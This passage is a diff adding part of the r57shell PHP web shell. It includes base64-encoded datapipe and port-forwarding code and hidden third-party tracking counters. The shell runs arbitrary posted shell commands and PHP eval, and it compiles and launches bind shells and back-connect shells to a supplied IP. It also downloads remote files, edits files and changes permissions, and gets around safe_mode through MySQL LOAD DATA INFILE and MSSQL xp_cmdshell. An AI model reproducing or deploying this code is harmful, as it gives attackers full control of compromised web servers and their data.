+29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
+MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
+gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
+5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
+HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
+dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
+KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
+ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
+E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
+Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
+NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
+J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
+CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
+dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
+gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
+lsZSk7DQogIHJldHVybiAwOw0KfQ==";
+$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
+CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
+bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
+gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
+NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
+iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
+aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
+SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
+xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
+WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
+CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
+yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
+I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
+m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
+IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
+lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
+QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
+CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
+c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
+NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
+UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
+DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
+ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
+1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
+$c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2
+JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l
+lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW
+FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L
+3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr
+J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR
+oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj
+xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO
+i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv
+dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB
+ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2
+hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg==";
+$c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh
+IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl
+hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz
+tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa
+XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u
+8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV
+ybmV0LS0+";
+echo $head;
+echo '</head>';
+if(empty($_POST['cmd'])) {
+$serv = array(127,192,172,10);
+$addr=@explode('.', $_SERVER['SERVER_ADDR']);
+$current_version = str_replace('.','',$version);
+if (!in_array($addr[0], $serv)) {
+@print "";
+@readfile ("");}}
+echo '<body bgcolor="#e4e0d8"><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
+<tr><td bgcolor=#cccccc width=160><font face=Verdana size=2>'.ws(1).'&nbsp;
+<font face=Webdings size=6><b>!</b></font><b>'.ws(2).'r57shell '.$version.'</b>
+</font></td><td bgcolor=#cccccc><font face=Verdana size=-2>';
+echo ws(2);
+echo "<b>".date ("d-m-Y H:i:s")."</b>";
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb.$rb."<br>";
+echo ws(2);
+echo (($safe_mode)?("safe_mode: <b><font color=green>ON</font></b>"):("safe_mode: <b><font color=red>OFF</font></b>"));
+echo ws(2);
+echo "PHP version: <b>".@phpversion()."</b>";
+$curl_on = @function_exists('curl_version');
+echo ws(2);
+echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>"));
+echo ws(2);
+echo "MySQL: <b>";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on){
+echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b>"; }
+echo ws(2);
+echo "MSSQL: <b>";
+$mssql_on = @function_exists('mssql_connect');
+if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo ws(2);
+echo "PostgreSQL: <b>";
+$pg_on = @function_exists('pg_connect');
+if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo ws(2);
+echo "Oracle: <b>";
+$ora_on = @function_exists('ocilogon');
+if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo "<br>".ws(2);
+echo "Disable functions : <b>";
+if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
+$free = @diskfreespace($dir);
+if (!$free) {$free = 0;}
+$all = @disk_total_space($dir);
+if (!$all) {$all = 0;}
+$used = $all-$free;
+$used_percent = @round(100/($all/$free),2);
+echo "<br>".ws(2)."HDD Free : <b>".view_size($free)."</b> HDD Total : <b>".view_size($all)."</b>";
+echo '</font></td></tr><table>
+<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
+<tr><td align=right width=100>';
+echo $font;
+if(!$windows){
+echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=Verdana size=-2 color=red><b>";
+$uname = ex('uname -a');
+echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
+if(!$safe_mode){
+$bsd1 = ex('sysctl -n kern.ostype');
+$bsd2 = ex('sysctl -n kern.osrelease');
+$lin1 = ex('sysctl -n kernel.ostype');
+$lin2 = ex('sysctl -n kernel.osrelease');
+}
+if (!empty($bsd1)&&!empty($bsd2)) { $sysctl = "$bsd1 $bsd2"; }
+else if (!empty($lin1)&&!empty($lin2)) {$sysctl = "$lin1 $lin2"; }
+else { $sysctl = "-"; }
+echo ws(3).$sysctl."<br>";
+echo ws(3).ex('echo $OSTYPE')."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+$id = ex('id');
+echo((!empty($id))?(ws(3).$id."<br>"):(ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>"));
+echo ws(3).$dir;
+echo "</b></font>";
+}
+else
+{
+echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=Verdana size=-2 color=red><b>";
+echo ws(3).@substr(@php_uname(),0,120)."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+echo ws(3).@get_current_user()."<br>";
+echo ws(3).$dir."<br>";
+echo "</font>";
+}
+echo "</font>";
+echo "</td></tr></table>";
+if(empty($c1)||empty($c2)) { die(); }
+$f = '<br>';
+$f .= base64_decode($c1);
+$f .= base64_decode($c2);
+if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
+{
+$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
+}
+if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
+ {
+ switch($_POST['what'])
+   {
+   case 'own':
+   @chown($_POST['param1'],$_POST['param2']);
+   break;
+   case 'grp':
+   @chgrp($_POST['param1'],$_POST['param2']);
+   break;
+   case 'mod':
+   @chmod($_POST['param1'],intval($_POST['param2'], 8));
+   break;
+   }
+ $_POST['cmd']="";
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
+ {
+   switch($_POST['what'])
+   {
+     case 'file':
+      if($_POST['action'] == "create")
+       {
+       if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { echo ce($_POST['mk_name']); $_POST['cmd']=""; }
+       else {
+        fclose($file);
+        $_POST['e_name'] = $_POST['mk_name'];
+        $_POST['cmd']="edit_file";
+        echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
+        }
+       }
+       else if($_POST['action'] == "delete")
+       {
+       if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
+       $_POST['cmd']="";
+       }
+     break;
+     case 'dir':
+      if($_POST['action'] == "create"){
+      if(mkdir($_POST['mk_name']))
+       {
+         $_POST['cmd']="";
+         echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
+       }
+      else { echo ce($_POST['mk_name']); $_POST['cmd']=""; }
+      }
+      else if($_POST['action'] == "delete"){
+      if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
+      $_POST['cmd']="";
+      }
+     break;
+   }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file")
+ {
+ if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
+ if(!$file=@fopen($_POST['e_name'],"r")) { echo re($_POST['e_name']); $_POST['cmd']=""; }
+ else {
+ echo $table_up3;
+ echo $font;
+ echo "<form name=save_file method=post>";
+ echo ws(3)."<b>".$_POST['e_name']."</b>";
+ echo "<div align=center><textarea name=e_text cols=121 rows=24>";
+ echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
+ fclose($file);
+ echo "</textarea>";
+ echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
+ echo "<input type=hidden name=dir value=".$dir.">";
+ echo "<input type=hidden name=cmd value=save_file>";
+ echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
+ echo "</div>";
+ echo "</font>";
+ echo "</form>";
+ echo "</td></tr></table>";
+ exit();
+ }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
+ {
+ if(!$file=@fopen($_POST['e_name'],"w")) { echo we($_POST['e_name']); }
+ else {
+ @fwrite($file,$_POST['e_text']);
+ @fclose($file);
+ $_POST['cmd']="";
+ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
+ }
+ }
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
+{
+ cf("/tmp/bd.c",$port_bind_bd_c);
+ $blah = ex("gcc -o /tmp/bd /tmp/bd.c");
+ @unlink("/tmp/bd.c");
+ $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
+ $_POST['cmd']="ps -aux | grep bd";
+}
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
+{
+ cf("/tmp/bdpl",$port_bind_bd_pl);
+ $p2=which("perl");
+ if(empty($p2)) $p2="perl";
+ $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
+ $_POST['cmd']="ps -aux | grep bdpl";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/back",$back_connect);
+ $p2=which("perl");
+ if(empty($p2)) $p2="perl";
+ $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/back.c",$back_connect_c);
+ $blah = ex("gcc -o /tmp/backc /tmp/back.c");
+ @unlink("/tmp/back.c");
+ $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/dp",$datapipe_pl);
+ $p2=which("perl");
+ if(empty($p2)) $p2="perl";
+ $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
+ $_POST['cmd']="ps -aux | grep dp";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/dpc.c",$datapipe_c);
+ $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
+ @unlink("/tmp/dpc.c");
+ $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
+ $_POST['cmd']="ps -aux | grep dpc";
+}
+if (!empty($_POST['alias'])){ foreach ($aliases as $alias_name=>$alias_cmd) { if ($_POST['alias'] == $alias_name){$_POST['cmd']=$alias_cmd;}}}
+if (!empty($HTTP_POST_FILES['userfile']['name']))
+{
+if(isset($_POST['nf1']) && !empty($_POST['new_name'])) { $nfn = $_POST['new_name']; }
+else { $nfn = $HTTP_POST_FILES['userfile']['name']; }
+@copy($HTTP_POST_FILES['userfile']['tmp_name'],
+            $_POST['dir']."/".$nfn)
+      or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>");
+}
+if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
+{
+ switch($_POST['with'])
+ {
+ case wget:
+ $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
+ break;
+ case fetch:
+ $_POST['cmd'] = which('fetch')." -p ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
+ break;
+ case lynx:
+ $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case links:
+ $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case GET:
+ $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case curl:
+ $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
+ break;
+ }
+}
+echo $table_up3;
+if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?("dir"):("ls -lia"); }
+else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }
+echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
+if($safe_mode)
+{
+ switch($_POST['cmd'])
+ {
+ case 'safe_dir':
+  $d=@dir($dir);
+  if ($d)
+   {
+   while (false!==($file=$d->read()))
+    {
+     if ($file=="." || $file=="..") continue;
+     @clearstatcache();
+     list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
+     if($windows){
+     echo date("d.m.Y H:i",$mtime);
+     if(@is_dir($file)) echo "  <DIR> "; else printf("% 7s ",$size);
+     }
+     else{
+     $owner = @posix_getpwuid($uid);
+     $grgid = @posix_getgrgid($gid);
+     echo $inode." ";
+     echo perms(@fileperms($file));
+     printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
+     echo date("d.m.Y H:i ",$mtime);
+     }
+     echo "$file\n";
+    }
+   $d->close();
+   }
+  else echo $lang[$language._text29];
+ break;
+ case 'safe_file':
+  if(@is_file($_POST['file']))
+   {
+   $file = @file($_POST['file']);
+   if($file)
+    {
+    $c = @sizeof($file);
+    for($i=0;$i<$c;$i++) { echo htmlspecialchars($file[$i]); }
+    }
+   else echo $lang[$language._text29];
+   }
+  else echo $lang[$language._text31];
+  break;
+  case 'test1':
+  $ci = @curl_init("file://".$_POST['test1_file']."");
+  $cf = @curl_exec($ci);
+  echo $cf;
+  break;
+  case 'test2':
+  @include($_POST['test2_file']);
+  break;
+  case 'test3':
+  if(!isset($_POST['test3_port'])||empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; }
+  $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
+  if($db)
+   {
+   if(@mysql_select_db($_POST['test3_md'],$db))
+    {
+     $sql = "DROP TABLE IF EXISTS temp_r57_table;";
+     @mysql_query($sql);
+     $sql = "CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL );";
+     @mysql_query($sql);
+     $sql = "LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table;";
+     @mysql_query($sql);
+     $sql = "SELECT * FROM temp_r57_table;";
+     $r = @mysql_query($sql);
+     while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }
+     $sql = "DROP TABLE IF EXISTS temp_r57_table;";
+     @mysql_query($sql);
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mysql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to mysql server";
+  break;
+  case 'test4':
+  if(!isset($_POST['test4_port'])||empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
+  $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
+  if($db)
+   {
+   if(@mssql_select_db($_POST['test4_md'],$db))
+    {
+     @mssql_query("drop table r57_temp_table",$db);
+     @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db);
+     @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
+     $res = mssql_query("select * from r57_temp_table",$db);
+     while(($row=@mssql_fetch_row($res)))
+      {
+      echo $row[0]."\r\n";
+      }
+    @mssql_query("drop table r57_temp_table",$db);
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mssql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to MSSQL server";
+  break;
+ }
+}
+else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_show")&&($_POST['cmd']!="db_query")){
+ $cmd_rep = ex($_POST['cmd']);
+ if($windows) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
+ else { echo @htmlspecialchars($cmd_rep)."\n"; }}
+if ($_POST['cmd']=="php_eval"){
+ $eval = @str_replace("<?","",$_POST['php_eval']);
+ $eval = @str_replace("?>","",$eval);
+ @eval($eval);}
